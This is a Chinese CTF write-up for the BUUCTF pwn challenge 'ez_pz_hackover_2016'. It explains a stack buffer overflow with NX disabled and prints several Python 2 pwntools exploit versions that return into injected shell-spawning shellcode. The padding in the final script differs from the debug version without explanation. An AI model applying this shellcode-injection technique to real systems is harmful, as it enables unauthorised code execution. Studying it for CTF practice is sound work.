[BUUCTF-pwn]——ez_pz_hackover_2016
checksec一下,NX都没开,十有八九是让自己写shellcode了
在IDA中,main里面没什么可以看的.
在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。
发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln函数。
并且dest可以栈溢出的因为n 远远大于 0x32。下面就是找到shellcode 的地址,作为返回地址就好了。在pwndbg里面寻找偏移。
我先将exploit大概写出来,如下:
from pwn import *
p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')
s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x32 + 0x4, '\x00')
payload+= 'this'+shellcode
p.sendline(payload)
p.interactive()
其中,'this’是返回地址,待确定。
在pwndbg中看看
修改exploit后为
from pwn import *
p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')
s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x32 + 0x4, '\x00')
payload+=p32(s_addr)+shellcode
p.sendline(payload)
p.interactive()
结果发现不可以继续调试发现, 返回地址不对。虽然不知道为啥
但是到ebp的距离是0x16
from pwn import *
p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')
s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x16 + 0x4 + 0x4, '\x00')
payload+='this'+shellcode
p.sendline(payload)
p.interactive()
调试确定’this’ 是 p32(s_addr - 0x1c)
所以最终exploit为
exploit
from pwn import *
p=process('./ez_pz_hackover_2016')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')
s_addr=int(p.recvuntil('\n'),16)
payload='crashme\x00'.ljust(0x16 + 0x4, '\x00')
payload+=p32(s_addr-0x1c)+shellcode
p.sendline(payload)
p.interactive()